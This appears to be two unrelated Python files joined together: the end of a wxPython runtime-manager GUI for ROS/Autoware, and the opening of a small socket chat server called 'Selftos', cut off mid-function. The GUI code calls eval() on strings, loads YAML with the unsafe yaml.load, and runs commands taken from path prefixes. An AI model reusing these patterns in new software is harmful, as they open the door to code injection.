self.SetSizer(szr)
def setup_tooltip(self):
if get_tooltips(self.var):
set_tooltips(self.obj, self.var)
if get_tooltip(self.var):
obj = self.lb if self.lb else (self if self.kind == 'radio_box' else self.obj)
set_tooltip(obj, self.var)
def create_bmbtn(self, filename, hdr):
dir = rtmgr_src_dir()
bm = wx.Bitmap(dir + filename, wx.BITMAP_TYPE_ANY)
style = wx.BORDER_NONE | wx.BU_EXACTFIT
obj = wx.lib.buttons.GenBitmapButton(self, wx.ID_ANY, bm, style=style)
self.Bind(wx.EVT_BUTTON, hdr, obj)
return obj
def get_v(self):
if self.kind in [ 'radio_box', 'menu' ]:
return self.choices_sel_get()
if self.kind in [ 'checkbox', 'toggle_button' ]:
return self.obj.GetValue()
if self.kind == 'checkboxes':
return self.obj.get()
if self.kind == 'hide':
return self.var.get('v')
if self.kind in [ 'path', 'str' ]:
return str(self.tc.GetValue())
if not self.has_slider and self.tc.GetValue() == '':
return ''
return self.get_tc_v()
def get_tc_v(self):
s = self.tc.GetValue()
v = str_to_float(s) if self.is_float else int(s)
if self.has_slider:
v = self.min if v < self.min else v
v = self.max if v > self.max else v
self.tc.SetValue(adjust_num_str(str(v)))
return v
def get_int_v(self):
v = self.get_tc_v()
if self.is_float:
v = int( self.int_max * (v - self.min) / self.w if self.w != 0 else 0 )
return v
def OnScroll(self, event):
iv = self.slider.GetValue()
s = str(iv)
if self.is_float:
v = self.min + float(self.w) * iv / self.int_max
s = str(Decimal(v).quantize(Decimal(str(self.get_step()))))
self.tc.SetValue(s)
self.update(self.var)
def OnIncBtn(self, event):
step = self.get_step()
self.add_v(step)
def OnDecBtn(self, event):
step = self.get_step()
self.add_v(-step)
def get_step(self):
step = self.var.get('step')
return step if step else 0.01 if self.is_float else 1
def add_v(self, step):
ov = self.get_v()
self.tc.SetValue(str(ov + step))
v = self.get_v()
if v != ov:
if self.has_slider:
self.slider.SetValue(self.get_int_v())
self.update(self.var)
def OnUpdate(self, event):
if self.has_slider:
self.slider.SetValue(self.get_int_v())
self.update(self.var)
def OnRef(self, event):
if file_dialog(self, self.tc, self.var) == wx.ID_OK:
self.update(self.var)
def choices_sel_get(self):
return self.obj.GetStringSelection() if self.var.get('choices_type') == 'str' else self.obj.GetSelection()
def choices_sel_set(self, v):
if self.var.get('choices_type') == 'str':
self.obj.SetStringSelection(v)
else:
self.obj.SetSelection(v)
def is_nl(self):
return self.has_slider or self.kind in [ 'path' ]
class MyDialogParam(rtmgr.MyDialogParam):
def __init__(self, *args, **kwds):
pdic = kwds.pop('pdic')
self.pdic_bak = pdic.copy()
gdic = kwds.pop('gdic')
prm = kwds.pop('prm')
rtmgr.MyDialogParam.__init__(self, *args, **kwds)
self.Bind(wx.EVT_CLOSE, self.OnClose)
ok_lb_key = 'open_dialog_ok_label'
if dic_list_get(gdic, 'dialog_type', 'config') == 'open' and ok_lb_key in gdic:
self.button_1.SetLabel( gdic.get(ok_lb_key) )
parent = self.panel_v
frame = self.GetParent()
self.panel = ParamPanel(parent, frame=frame, pdic=pdic, gdic=gdic, prm=prm)
szr = sizer_wrap((self.panel,), wx.VERTICAL, 1, wx.EXPAND, 0, parent)
self.SetTitle(prm.get('name', ''))
(w,h) = self.GetSize()
(w2,_) = szr.GetMinSize()
w2 += 20
if w2 > w:
self.SetSize((w2,h))
def OnOk(self, event):
self.panel.update()
self.panel.detach_func()
self.EndModal(0)
def OnCancel(self, event):
self.panel.pdic.update(self.pdic_bak) # restore
self.panel.detach_func()
self.panel.update()
self.EndModal(-1)
def OnClose(self, event):
self.OnCancel(event)
class MyDialogDpm(rtmgr.MyDialogDpm):
def __init__(self, *args, **kwds):
pdic = kwds.pop('pdic')
self.pdic_bak = pdic.copy()
gdic = kwds.pop('gdic')
prm = kwds.pop('prm')
rtmgr.MyDialogDpm.__init__(self, *args, **kwds)
self.Bind(wx.EVT_CLOSE, self.OnClose)
parent = self.panel_v
frame = self.GetParent()
self.frame = frame
self.panel = ParamPanel(parent, frame=frame, pdic=pdic, gdic=gdic, prm=prm)
szr = sizer_wrap((self.panel,), wx.VERTICAL, 1, wx.EXPAND, 0, parent)
self.SetTitle(prm.get('name', ''))
(w,h) = self.GetSize()
(w2,_) = szr.GetMinSize()
w2 += 20
if w2 > w:
self.SetSize((w2,h))
fix_link_color(self.hyperlink_car)
fix_link_color(self.hyperlink_pedestrian)
def OnOk(self, event):
self.panel.update()
self.panel.detach_func()
self.EndModal(0)
def OnLink(self, event):
obj = event.GetEventObject()
dic = { self.hyperlink_car : self.frame.button_car_dpm,
self.hyperlink_pedestrian : self.frame.button_pedestrian_dpm }
obj = dic.get(obj)
if obj:
self.frame.OnHyperlinked_obj(obj)
def OnCancel(self, event):
self.panel.pdic.update(self.pdic_bak) # restore
self.panel.detach_func()
self.panel.update()
self.EndModal(-1)
def OnClose(self, event):
self.OnCancel(event)
class MyDialogCarPedestrian(rtmgr.MyDialogCarPedestrian):
def __init__(self, *args, **kwds):
pdic = kwds.pop('pdic')
self.gdic = kwds.pop('gdic')
prm = kwds.pop('prm')
rtmgr.MyDialogCarPedestrian.__init__(self, *args, **kwds)
self.Bind(wx.EVT_CLOSE, self.OnClose)
frame = self.GetParent()
self.frame = frame
self.SetTitle(prm.get('name', ''))
fix_link_color(self.hyperlink_car)
fix_link_color(self.hyperlink_pedestrian)
def OnLink(self, event):
obj = event.GetEventObject()
car_ped = { self.hyperlink_car : 'car', self.hyperlink_pedestrian : 'pedestrian' }.get(obj, 'car')
obj_key = self.gdic.get('car_pedestrian_obj_key', {}).get(car_ped)
obj = getattr(self.frame, 'button_' + obj_key, None) if obj_key else None
if obj:
self.frame.OnHyperlinked_obj(obj)
self.EndModal(0)
def OnClose(self, event):
self.EndModal(-1)
class MyDialogLaneStop(rtmgr.MyDialogLaneStop):
def __init__(self, *args, **kwds):
self.pdic = kwds.pop('pdic')
self.gdic = kwds.pop('gdic')
self.prm = kwds.pop('prm')
rtmgr.MyDialogLaneStop.__init__(self, *args, **kwds)
self.frame = self.GetParent()
def update(self):
update_func = self.gdic.get('update_func')
if update_func:
update_func(self.pdic, self.gdic, self.prm)
def OnTrafficRedLight(self, event):
self.pdic['traffic_light'] = 0
self.update()
def OnTrafficGreenLight(self, event):
self.pdic['traffic_light'] = 1
self.update()
def OnTrafficLightRecognition(self, event):
pub = rospy.Publisher('/config/lane_stop', ConfigLaneStop, latch=True, queue_size=10)
msg = ConfigLaneStop()
if event.GetEventObject().GetValue():
msg.manual_detection = False
else:
msg.manual_detection = True
pub.publish(msg)
def OnOk(self, event):
self.EndModal(0)
def OnCancel(self, event):
self.EndModal(-1)
class MyDialogNdtMapping(rtmgr.MyDialogNdtMapping):
def __init__(self, *args, **kwds):
self.pdic = kwds.pop('pdic')
self.pdic_bak = self.pdic.copy()
self.gdic = kwds.pop('gdic')
self.prm = kwds.pop('prm')
rtmgr.MyDialogNdtMapping.__init__(self, *args, **kwds)
parent = self.panel_v
frame = self.GetParent()
self.panel = ParamPanel(parent, frame=frame, pdic=self.pdic, gdic=self.gdic, prm=self.prm)
sizer_wrap((self.panel,), wx.VERTICAL, 1, wx.EXPAND, 0, parent)
self.update_filename()
self.klass_msg = ConfigNdtMappingOutput
self.pub = rospy.Publisher('/config/ndt_mapping_output', self.klass_msg, queue_size=10)
def update_filename(self):
tc = self.text_ctrl_path
path = tc.GetValue()
(dn, fn) = os.path.split(path)
now = datetime.datetime.now()
fn = 'autoware-%02d%02d%02d.pcd' % (
now.year % 100, now.month, now.day)
path = os.path.join(dn, fn)
set_path(tc, path)
def OnRef(self, event):
tc = self.text_ctrl_path
file_dialog(self, tc, { 'path_type' : 'save' } )
def OnRadio(self, event):
v = self.radio_btn_filter_resolution.GetValue()
tc = self.text_ctrl_filter_resolution
tc.Enable(v)
def OnPcdOutput(self, event):
tc = self.text_ctrl_filter_resolution
v = tc.GetValue() if self.radio_btn_filter_resolution.GetValue() else '0.0'
msg = self.klass_msg()
msg.filename = self.text_ctrl_path.GetValue()
msg.filter_res = str_to_float(v)
self.pub.publish(msg)
def OnOk(self, event):
self.panel.detach_func()
self.EndModal(0)
class InfoBarLabel(wx.BoxSizer):
def __init__(self, parent, btm_txt=None, lmt_bar_prg=90, bar_orient=wx.VERTICAL):
wx.BoxSizer.__init__(self, orient=wx.VERTICAL)
self.lb = wx.StaticText(parent, wx.ID_ANY, '')
self.bar = BarLabel(parent, hv=bar_orient, show_lb=False)
bt = wx.StaticText(parent, wx.ID_ANY, btm_txt) if btm_txt else None
self.Add(self.lb, 0, wx.ALIGN_CENTER_HORIZONTAL, 0)
if bar_orient == wx.VERTICAL:
sz = self.bar.GetSize()
sz.SetWidth(20)
self.bar.SetMinSize(sz)
self.Add(self.bar, 1, wx.ALIGN_CENTER_HORIZONTAL, 0)
if bt:
self.Add(bt, 0, wx.ALIGN_CENTER_HORIZONTAL, 0)
else:
szr = wx.BoxSizer(wx.HORIZONTAL)
if bt:
szr.Add(bt, 0, 0, 0)
szr.Add(self.bar, 1, 0, 0)
self.Add(szr, 1, wx.EXPAND, 0)
self.lmt_bar_prg = lmt_bar_prg
def lb_set(self, txt, col):
self.lb.SetForegroundColour(col)
self.lb.SetLabel(txt)
self.Layout()
def bar_set(self, prg):
(col1, col2) = (wx.Colour(0,0,250), wx.Colour(0,0,128))
if prg >= self.lmt_bar_prg:
(col1, col2) = (wx.Colour(250,0,0), wx.Colour(128,0,0))
self.bar.set_col(col1, col2)
self.bar.set(prg)
class Checkboxes(wx.Panel):
def __init__(self, parent, item_n, lb):
wx.Panel.__init__(self, parent, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize)
self.boxes = [ wx.CheckBox(self, wx.ID_ANY, lb + str(i)) for i in range(item_n) ]
vsz = wx.BoxSizer(wx.VERTICAL)
for j in range((item_n + 7) // 8):
hsz = wx.BoxSizer(wx.HORIZONTAL)
for i in range(8):
idx = j * 8 + i
if idx < len(self.boxes):
hsz.Add(self.boxes[idx], 0, wx.LEFT, 8)
vsz.Add(hsz)
self.SetSizer(vsz)
vsz.Fit(self)
def set(self, vs):
vs = vs if vs else [ True for box in self.boxes ]
for (box, v) in zip(self.boxes, vs):
box.SetValue(v)
def get(self):
return [ box.GetValue() for box in self.boxes ]
class BarLabel(wx.Panel):
def __init__(self, parent, txt='', pos=wx.DefaultPosition, size=wx.DefaultSize, style=0, hv=wx.HORIZONTAL, show_lb=True):
wx.Panel.__init__(self, parent, wx.ID_ANY, pos, size)
self.lb = wx.StaticText(self, wx.ID_ANY, '', style=style)
self.txt = txt
self.hv = hv
self.dir = wx.SOUTH if hv == wx.HORIZONTAL else wx.EAST
self.show_lb = show_lb
self.prg = -1
self.dflt_col1 = wx.Colour(250,250,250)
self.dflt_col2 = wx.Colour(128,128,128)
self.col1 = self.dflt_col1
self.col2 = self.dflt_col2
self.Bind(wx.EVT_PAINT, self.OnPaint)
def set(self, prg):
self.prg = prg
if self.show_lb:
self.lb.SetLabel(self.txt + str(prg) + '%' if prg >= 0 else '')
self.Refresh()
def set_col(self, col1, col2):
self.col1 = col1 if col1 != wx.NullColour else self.dflt_col1
self.col2 = col2 if col2 != wx.NullColour else self.dflt_col2
def clear(self):
self.set(-1)
def OnPaint(self, event):
dc = wx.PaintDC(self)
(w,h) = self.GetSize()
if self.IsEnabled():
p = (w if self.hv == wx.HORIZONTAL else h) * self.prg / 100
rect = wx.Rect(0, 0, p, h) if self.hv == wx.HORIZONTAL else wx.Rect(0, h-p, w, p)
dc.GradientFillLinear(rect, self.col1, self.col2, self.dir)
rect = wx.Rect(p, 0, w-p, h) if self.hv == wx.HORIZONTAL else wx.Rect(0, 0, w, h-p)
dc.GradientFillLinear(rect, wx.Colour(200,200,200), wx.Colour(220,220,220), self.dir)
else:
rect = wx.Rect(0, 0, w, h)
dc.GradientFillLinear(rect, wx.Colour(250,250,250), wx.Colour(250,250,250), self.dir)
class ColorLabel(wx.Panel):
def __init__(self, parent, lst=[], pos=wx.DefaultPosition, size=wx.DefaultSize, style=0):
wx.Panel.__init__(self, parent, wx.ID_ANY, pos, size)
self.lst = lst
self.Bind(wx.EVT_PAINT, self.OnPaint)
def set(self, lst):
self.lst = lst
self.Refresh()
def OnPaint(self, event):
dc = wx.PaintDC(self)
dc.Clear()
#change_font_point_by_rate(dc, 0.75)
(x,y) = (0,0)
(_, h, _, _) = dc.GetFullTextExtent(' ')
for v in self.lst:
if type(v) is tuple and len(v) == 2:
(x,y) = v
elif type(v) is tuple and len(v) == 3:
dc.SetTextForeground(v)
elif v == '\n':
(x,y) = (0,y+h)
elif type(v) is str:
dc.DrawText(v, x, y)
(w, _, _, _) = dc.GetFullTextExtent(v)
x += w
class StrValObj:
def __init__(self, s, v):
self.s = s
self.v = v
def GetValue(self):
return self.v
def SetValue(self, v):
self.v = v
class MyApp(wx.App):
def OnInit(self):
wx.InitAllImageHandlers()
frame_1 = MyFrame(None, wx.ID_ANY, "")
self.SetTopWindow(frame_1)
buttons_color_hdr_setup(frame_1)
frame_1.Show()
return 1
class MyDialogRosbagRecord(rtmgr.MyDialogRosbagRecord):
def __init__(self, *args, **kwds):
self.cmd_dic = kwds.pop('cmd_dic')
rtmgr.MyDialogRosbagRecord.__init__(self, *args, **kwds)
self.cbs = []
self.refresh()
self.parent = self.GetParent()
self.cmd_dic[ self.button_start ] = ('rosbag record', None)
self.toggles = [ self.button_start, self.button_stop ]
def OnRef(self, event):
tc = self.text_ctrl
file_dialog(self, tc, { 'path_type' : 'save' } )
def OnStart(self, event):
key_obj = self.button_start
path = self.text_ctrl.GetValue()
if path == '':
print('path=""')
return
topic_opt = []
if self.cbs[0].GetValue(): # 'All'
topic_opt = [ '-a' ]
else:
for obj in self.cbs:
if obj.GetValue():
topic_opt += [ obj.GetLabel() ]
if topic_opt == []:
print('topic=[]')
return
args = topic_opt + [ '-O', path ]
split_arg = [ '--split' ] if self.checkbox_split.GetValue() else []
size_arg = self.size_arg_get()
if split_arg and not size_arg:
wx.MessageBox('size is required, with split')
return
args += split_arg + size_arg
(cmd, proc) = self.cmd_dic[ key_obj ]
proc = self.parent.launch_kill(True, cmd, proc, add_args=args, obj=key_obj, kill_children=True)
self.cmd_dic[ key_obj ] = (cmd, proc)
self.parent.toggle_enables(self.toggles)
def OnStop(self, event):
key_obj = self.button_start
(cmd, proc) = self.cmd_dic[ key_obj ]
proc = self.parent.launch_kill(False, cmd, proc, sigint=True, obj=key_obj, kill_children=True)
self.cmd_dic[ key_obj ] = (cmd, proc)
self.parent.toggle_enables(self.toggles)
self.Hide()
def OnRefresh(self, event):
self.refresh()
def refresh(self):
lst = [ 'All' ] + subprocess.check_output([ 'rostopic', 'list' ]).strip().split('\n')
panel = self.panel_1
szr = self.sizer_topic
for obj in self.cbs:
szr.Remove(obj)
obj.Destroy()
self.cbs = []
for topic in lst:
obj = wx.CheckBox(panel, wx.ID_ANY, topic)
bdr = 4 if topic == 'All' else 4 * 4
szr.Add(obj, 0, wx.LEFT, bdr)
self.cbs.append(obj)
szr.Layout()
panel.SetVirtualSize(szr.GetMinSize())
self.update_filename()
def update_filename(self):
tc = self.text_ctrl
path = tc.GetValue()
(dn, fn) = os.path.split(path)
now = datetime.datetime.now()
fn = 'autoware-%04d%02d%02d%02d%02d%02d.rosbag' % (
now.year, now.month, now.day, now.hour, now.minute, now.second)
path = os.path.join(dn, fn)
set_path(tc, path)
def size_arg_get(self):
tc = self.text_ctrl_size
s = tc.GetValue()
mb = 0
try:
mb = str_to_float(s)
except ValueError:
mb = 0
if mb <= 0:
tc.SetValue('')
return [ '--size=' + str(int(mb * 1024 * 1024)) ] if mb > 0 else []
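# file_dialog() below opens a wx directory or file chooser depending on
# path_inf_dic['path_type'] ('dir', 'save', 'multi', or a plain open dialog by
# default), writes the selected path(s) back into the text control, and returns
# the dialog result. A hypothetical call for selecting several files:
#   file_dialog(self, tc, { 'path_type' : 'multi' })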
def file_dialog(parent, tc, path_inf_dic={}):
path = tc.GetValue()
path = get_top(path.split(','), path)
(dn, fn) = os.path.split(path)
path_type = path_inf_dic.get('path_type')
if path_type == 'dir':
fns = path_inf_dic.get('filenames')
if type(fns) is str and fns[-5:] == '.yaml':
fns = load_yaml(fns)
if type(fns) is not list:
fns = None
path_inf_dic['filenames'] = fns
dlg = wx.DirDialog(parent, defaultPath=path)
else:
st_dic = { 'save' : wx.FD_SAVE, 'multi' : wx.FD_MULTIPLE }
dlg = wx.FileDialog(parent, defaultDir=dn, defaultFile=fn,
style=st_dic.get(path_type, wx.FD_DEFAULT_STYLE))
ret = show_modal(dlg)
if ret == wx.ID_OK:
path = ','.join(dlg.GetPaths()) if path_type == 'multi' else dlg.GetPath()
if path_type == 'dir' and fns:
path = ','.join([ path + '/' + fn for fn in fns ])
set_path(tc, path)
dlg.Destroy()
return ret
def button_color_change(btn, v=None):
if v is None and type(btn) is wx.ToggleButton:
v = btn.GetValue()
key = ( v , btn.IsEnabled() )
dic = { (True,True):('#F9F9F8','#8B8BB9'), (True,False):('#F9F9F8','#E0E0F0') }
(fcol, bcol) = dic.get(key, (wx.NullColour, wx.NullColour))
btn.SetForegroundColour(fcol)
btn.SetBackgroundColour(bcol)
def OnButtonColorHdr(event):
btn = event.GetEventObject()
dic = { wx.EVT_TOGGLEBUTTON.typeId : None,
wx.EVT_LEFT_DOWN.typeId : True,
wx.EVT_LEFT_UP.typeId : False }
v = dic.get(event.GetEventType(), '?')
if v != '?':
button_color_change(btn, v)
event.Skip()
btn_null_bgcol = None
def is_btn_null_bgcol(btn):
global btn_null_bgcol
bak = btn.GetBackgroundColour()
if btn_null_bgcol is None:
btn.SetBackgroundColour(wx.NullColour)
btn_null_bgcol = btn.GetBackgroundColour()
if bak != btn_null_bgcol:
btn.SetBackgroundColour(bak)
return bak == btn_null_bgcol
def button_color_hdr_setup(btn):
hdr = OnButtonColorHdr
if type(btn) is wx.ToggleButton:
btn.Bind(wx.EVT_TOGGLEBUTTON, hdr)
elif type(btn) is wx.Button and is_btn_null_bgcol(btn):
btn.Bind(wx.EVT_LEFT_DOWN, hdr)
btn.Bind(wx.EVT_LEFT_UP, hdr)
def buttons_color_hdr_setup(frm_obj):
key = 'button_'
btns = [ getattr(frm_obj, nm) for nm in dir(frm_obj) if nm[:len(key)] == key ]
for btn in btns:
button_color_hdr_setup(btn)
def show_modal(dlg):
buttons_color_hdr_setup(dlg)
return dlg.ShowModal()
def load_yaml(filename, def_ret=None):
dir = rtmgr_src_dir()
path = dir + filename
if not os.path.isfile(path):
return def_ret
print('loading ' + filename)
f = open(dir + filename, 'r')
d = yaml.load(f)
f.close()
return d
def terminate_children(proc, sigint=False):
for child in psutil.Process(proc.pid).get_children():
terminate_children(child, sigint)
terminate(child, sigint)
def terminate(proc, sigint=False):
if sigint:
proc.send_signal(signal.SIGINT)
else:
proc.terminate()
def th_start(target, kwargs={}):
ev = threading.Event()
kwargs['ev'] = ev
th = threading.Thread(target=target, kwargs=kwargs)
th.daemon = True
th.start()
return (th, ev)
def th_end((th, ev)):
ev.set()
th.join()
def que_clear(que):
with que.mutex:
que.queue.clear()
def append_tc_limit(tc, s, rm_chars=0):
if rm_chars > 0:
tc.Remove(0, rm_chars)
tc.AppendText(s)
def cut_esc(s):
while True:
i = s.find(chr(27))
if i < 0:
break
j = s.find('m', i)
if j < 0:
break
s = s[:i] + s[j+1:]
return s
def change_font_point_by_rate(obj, rate=1.0):
font = obj.GetFont()
pt = font.GetPointSize()
pt = int(pt * rate)
font.SetPointSize(pt)
obj.SetFont(font)
def fix_link_color(obj):
t = type(obj)
if t is CT.GenericTreeItem or t is CT.CustomTreeCtrl:
obj.SetHyperTextVisitedColour(obj.GetHyperTextNewColour())
elif t is wx.HyperlinkCtrl:
obj.SetVisitedColour(obj.GetNormalColour())
def get_tooltip(dic):
return dic.get('desc')
def get_tooltips(dic):
return dic.get('descs', [])
def set_tooltip(obj, dic):
set_tooltip_str(obj, get_tooltip(dic))
def set_tooltip_str(obj, s):
if s and getattr(obj, 'SetToolTipString', None):
obj.SetToolTipString(s)
def set_tooltips(obj, dic):
lst = get_tooltips(dic)
if lst and getattr(obj, 'SetItemToolTip', None):
for (ix, s) in enumerate(lst):
obj.SetItemToolTip(ix, s)
def get_tooltip_obj(obj):
if getattr(obj, 'GetToolTip', None):
t = obj.GetToolTip()
return t.GetTip() if t else None
return None
def scaled_bitmap(bm, scale):
(w, h) = bm.GetSize()
img = wx.ImageFromBitmap(bm)
img = img.Scale(w * scale, h * scale, wx.IMAGE_QUALITY_HIGH)
return wx.BitmapFromImage(img)
def sizer_wrap(add_objs, orient=wx.VERTICAL, prop=0, flag=0, border=0, parent=None):
szr = wx.BoxSizer(orient)
for obj in add_objs:
szr.Add(obj, prop, flag, border)
if parent:
parent.SetSizer(szr)
return szr
def static_box_sizer(parent, s, orient=wx.VERTICAL):
sb = wx.StaticBox(parent, wx.ID_ANY, s)
sb.Lower()
return wx.StaticBoxSizer(sb, orient)
def wx_flag_get(flags):
dic = { 'top' : wx.TOP, 'bottom' : wx.BOTTOM, 'left' : wx.LEFT, 'right' : wx.RIGHT,
'all' : wx.ALL, 'expand' : wx.EXPAND, 'fixed_minsize' : wx.FIXED_MINSIZE,
'center_v' : wx.ALIGN_CENTER_VERTICAL, 'center_h' : wx.ALIGN_CENTER_HORIZONTAL,
'passwd' : wx.TE_PASSWORD }
lst = [ dic.get(f) for f in flags if f in dic ]
return reduce(lambda a,b : a+b, [0] + lst)
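# wx_flag_get() maps the YAML-style flag names above to wx flags and sums them,
# e.g. wx_flag_get(['left', 'expand']) evaluates to wx.LEFT + wx.EXPAND;
# unknown names are silently ignored.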
def msg_path_to_obj_attr(msg, path):
lst = path.split('.')
obj = msg
for attr in lst[:-1]:
obj = getattr(obj, attr, None)
return (obj, lst[-1])
def str_to_rosval(s, type_str, def_ret=None):
cvt_dic = {
'int8':int , 'int16':int , 'int32':int ,
'uint8':int , 'uint16':int , 'uint32':int ,
'int64':long , 'uint64':long,
'float32':float, 'float64':float,
}
t = cvt_dic.get(type_str)
s = s.replace(',','.') if t is float and type(s) is str else s
return t(s) if t else def_ret
def str_to_float(s):
return float( s.replace(',','.') )
def set_path(tc, v):
tc.SetValue(v)
tc.SetInsertionPointEnd()
def set_val(obj, v):
func = getattr(obj, 'SetValue', getattr(obj, 'Check', None))
if func:
func(v)
obj_refresh(obj)
if type(obj) is wx.ToggleButton:
button_color_change(obj)
def enables_set(obj, k, en):
d = attr_getset(obj, 'enabLes', {})
d[k] = en
d['last_key'] = k
obj.Enable( all( d.values() ) )
if isinstance(obj, wx.HyperlinkCtrl):
if not hasattr(obj, 'coLor'):
obj.coLor = { True:obj.GetNormalColour(), False:'#808080' }
c = obj.coLor.get(obj.IsEnabled())
obj.SetNormalColour(c)
obj.SetVisitedColour(c)
def enables_get(obj, k, def_ret=None):
return attr_getset(obj, 'enabLes', {}).get(k, def_ret)
def enables_get_last(obj):
k = enables_get(obj, 'last_key')
return (k, enables_get(obj, k))
def obj_refresh(obj):
if type(obj) is CT.GenericTreeItem:
while obj.GetParent():
obj = obj.GetParent()
tree = obj.GetData()
tree.Refresh()
# dic_list util (push, pop, get)
def dic_list_push(dic, key, v):
dic_getset(dic, key, []).append(v)
def dic_list_pop(dic, key):
dic.get(key, [None]).pop()
def dic_list_get(dic, key, def_ret=None):
return dic.get(key, [def_ret])[-1]
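# The dic_list helpers above treat dic[key] as a stack, and the bak_stk_*
# helpers below use that to save and restore a key's previous value under
# '<key>_bak_str'. A minimal sketch:
#   d = {'func': f1}
#   bak_stk_push(d, 'func'); d['func'] = f2   # shadow f1
#   bak_stk_pop(d, 'func')                    # restores d['func'] == f1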
def bak_stk_push(dic, key):
if key in dic:
k = key + '_bak_str'
dic_getset(dic, k, []).append( dic.get(key) )
def bak_stk_pop(dic, key):
k = key + '_bak_str'
stk = dic.get(k, [])
if len(stk) > 0:
dic[key] = stk.pop()
else:
del dic[key]
def bak_stk_set(dic, key, v):
bak_stk_push(dic, key)
dic[key] = v
def attr_getset(obj, name, def_ret):
if not hasattr(obj, name):
setattr(obj, name, def_ret)
return getattr(obj, name)
def dic_getset(dic, key, def_ret):
if key not in dic:
dic[key] = def_ret
return dic.get(key)
def lst_append_once(lst, v):
exist = v in lst
if not exist:
lst.append(v)
return exist
def lst_remove_once(lst, v):
exist = v in lst
if exist:
lst.remove(v)
return exist
def get_top(lst, def_ret=None):
return lst[0] if len(lst) > 0 else def_ret
def adjust_num_str(s):
if '.' in s:
while s[-1] == '0':
s = s[:-1]
if s[-1] == '.':
s = s[:-1]
return s
def rtmgr_src_dir():
return os.path.abspath(os.path.dirname(__file__)) + "/"
def path_expand_cmd(path):
lst = path.split('/')
s = lst[0]
if s[:2] == '$(' and s[-1] == ')':
cmd = s[2:-1].split(' ')
lst[0] = subprocess.check_output(cmd).strip()
path = '/'.join(lst)
return path
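# path_expand_cmd() expands a leading '$( ... )' shell-style prefix by running
# the command inside it, so (for example, in a ROS environment)
# '$(rospack find runtime_manager)/icon.png' becomes '<package path>/icon.png'.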
def eval_if_str(self, v):
return eval(v) if type(v) is str else v
def dic_eval_if_str(self, dic, key, def_ret=None):
return eval_if_str( self, dic.get(key, def_ret) )
def prn_dict(dic):
for (k,v) in dic.items():
print (k, ':', v)
def send_to_proc_manager(order):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
sock.connect(PROC_MANAGER_SOCK)
except socket.error:
print('Failed connect to {}'.format(PROC_MANAGER_SOCK))
return -1
sock.send(yaml.dump(order))
ret = sock.recv(1024)
sock.close()
return int(ret) == 0
def set_process_nice(proc, value):
order = {
"name": "nice",
"pid": proc.pid,
"nice": value
}
return send_to_proc_manager(order)
def set_process_cpu_affinity(proc, cpus):
order = {
"name": "cpu_affinity",
"pid": proc.pid,
"cpus": cpus,
}
return send_to_proc_manager(order)
def shutdown_proc_manager():
order = {
"name": "shutdown",
}
return send_to_proc_manager(order)
def set_scheduling_policy(proc, policy, priority):
order = {
"name": "scheduling_policy",
"pid": proc.pid,
"policy": policy,
"priority": priority,
}
return send_to_proc_manager(order)
if __name__ == "__main__":
gettext.install("app")
app = MyApp(0)
app.MainLoop()
# EOF
|
server.py
|
# [PROGRAM]
#
# Selftos Server by therenaydin.
# Tested with Windows 10 and Linux. It may not work properly on other Windows versions or operating systems!
# You need to install the required libraries with pip, otherwise the program will not start.
# We recommend running it with the screen command on your SSH server; otherwise the server shuts down the moment you close the SSH connection.
# More details: https://www.fullstackpython.com/screen.html
# Do not forget to enter your own server's IP address on line 175.
# The PORT number is read from the file named port.txt, so you do not need to add anything here.
#
# [AUTHOR]
#
# Eren Aydın ~ therenaydin
# E-mail: therenaydin@gmail.com
# Discord: therenaydin#8431
#
# [LICENSE]
#
# This program is free of charge.
# It is shared with the community so that people can modify it and improve their skills.
# You may edit and redistribute the program.
# You may use it in your assignments.
#
# [REFERENCES]
#
# https://www.neuralnine.com/
# https://python-forum.io/
# https://www.youtube.com/channel/UC8wZnXYK_CGKlBcZp-GxYPA (NeuralNine)
# https://pythonprogramming.net/
# https://www.youtube.com/user/sentdex
# https://www.youtube.com/channel/UCi8b7ab1pEJ40hz4E_PDROQ (Melih Görgülü)
# https://stackoverflow.com/
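# Usage sketch (assumes python3, the pip dependencies such as colorama, and a
# port.txt file are in place on the SSH host, as described above):
#   screen -S selftos          # keep the server alive after the SSH session ends
#   python3 server.py
#   (detach with Ctrl+A then D, reattach later with `screen -r selftos`)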
import socket
from threading import Thread
import time
import sys
from colorama import Fore, Back, Style, init
init(autoreset=True)
def accept_incoming_connections(): # Accepts incoming connections.
while True:
client, client_address = SERVER.accept()
print("%s:%s connected." % client_address)
client.send(bytes("8jhhaZaaq766712h5aaoaoaoaoppp17127477VVVAHAGgagx0Pz_12", "utf8")) # Sunucuya "şifreli" mesaj gönderir. Oynamayın.
addresses[client] = client_address
Thread(target=handle_client, args=(client,)).start()
def handle_client(client):
while True:
t = time.localtime()
current_time = time.strftime("[%H:%M:%S]", t)
Thread(target=announcements, args=(client,)).start()
try:
name = client.recv(BUFSIZ).decode("utf8")
if name in users:
client.send(bytes("Looks like you're already connected to the server!", "utf8")) # aynı sunucuya birden fazla client ile bağlanmaya çalışırsanız cliente gönderilecek mesaj.
try:
del clients[client]
except KeyError:
raise KeyError("[ERROR 100] "+name+" Multiple Client Try.") # message shown on the server console if you try to connect to the same server with more than one client.
else:
users.append(name)
global usernames
usernames = ', '.join(users)
welcome = '[Room] Welcome '+ name +'. Enjoy!' + "+"
tmp = " "
tmp = tmp.join(list(clients.values()))
welcome = welcome + tmp
client.send(bytes(welcome, "utf8"))
clients[client] = name
msg = name +" connected to room."+"+"
joinlog = current_time +" >>>>>"+name +" connected to room." + "<<<<<"
with open("LOGS.txt","a") as output: # LOGS.txt dosyasına giren kişiyi kayıt alır.
output.write(joinlog + '\n')
output.close()
tmp = " "
tmp = tmp.join(list(clients.values()))
msg = msg + tmp
broadcast(bytes(msg, "utf8"))
break
except ConnectionResetError:
try:
del clients[client]
except:
pass
try:
users.remove(name)
except:
pass
except BrokenPipeError:
pass
while True:
try:
msg = client.recv(BUFSIZ)
checkMessage = str(msg)
if len(msg) > 60:
client.send(bytes("[Room] Message is too long (maximum is 60 characters).", "utf8")) # mesaj 60 karakterden uzun ise yayınlanmaz ve hata mesajı gönderilir.
elif (msg == bytes("7AHSGHA8125125125.AGSAGMKJASAH_1571257125AHSH.ZZZZZ", "utf8")): # do not modify.
client.send(bytes("[Room] Failed to send message, try again...", "utf8"))
elif (checkMessage.find("kagsjhHYA") != -1): # When a file is sent, everyone on the server is notified. Do not modify.
sender = checkMessage.split("+")[1]
filename = checkMessage.split("+")[2]
